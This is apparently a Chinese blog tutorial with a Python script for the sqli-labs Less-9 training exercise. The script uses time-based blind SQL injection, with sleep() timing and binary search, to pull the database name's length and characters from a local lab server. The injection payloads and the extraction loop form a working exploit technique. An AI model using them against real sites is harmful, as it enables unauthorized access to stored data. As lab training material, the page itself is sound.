Python教程
sqli-labs 第九关 基于时间盲注 python 脚本
本文主要是介绍sqli-labs 第九关 基于时间盲注 python 脚本,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
# @Author:Mirror
import time
import requests
db_len = 0
def get_schema_len (url):
len = 0
left = 0
right = 20
while (left <= right):
mid = left + (right - left)//2;
data = "id=1' and if(length(database())>{},sleep(0.4),1)--+".format(mid)
one = time.time()
res = requests.get(url,data)
# print (res.url)
two = time.time()
if abs(two - one) >= (0.4):
left = mid + 1
else:
right = mid - 1
len = left
print (len)
return len
def get_schema_name(url):
len = get_schema_len(url)
db_name = ''
for i in range(1,len+1):
left = 0
right = 128
while(left <= right):
mid = left + (right - left)//2
data = "id=1' and if (substr(database(),{},1)>'{}',sleep(0.4),1)--+".format(i,chr(mid))
one = time.time()
res = requests.get(url,data)
print (res.url)
two = time.time()
if abs(two - one) >=0.4:
left = mid + 1
else :
right = mid - 1
db_name+=chr(left)
print (db_name)
url = "http://localhost:800/sqli-labs/Less-9/"
get_schema_name(url)
以上是一部分,要学会自己编写脚本喔!库名好像都是大写
这篇关于sqli-labs 第九关 基于时间盲注 python 脚本的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
获取参数学习:Python编程入门教程11-14
-
Python编程基础入门11-14
-
Python编程入门指南11-14
-
Python基础教程11-13
-
Python编程基础指南11-12
-
Python基础编程教程11-12
-
Python编程基础与实践示例11-08
-
Python编程基础指南11-07
-
Python编程基础入门指南11-06
-
怎么使用python 计算两个GPS的距离功能-icode9专业技术文章分享11-06
-
Python 基础编程入门教程11-06
-
Python编程基础:变量与类型11-05
-
Python编程基础:变量与类型11-05
-
Python编程基础:变量与类型11-04
-
Python编程基础11-04
栏目导航
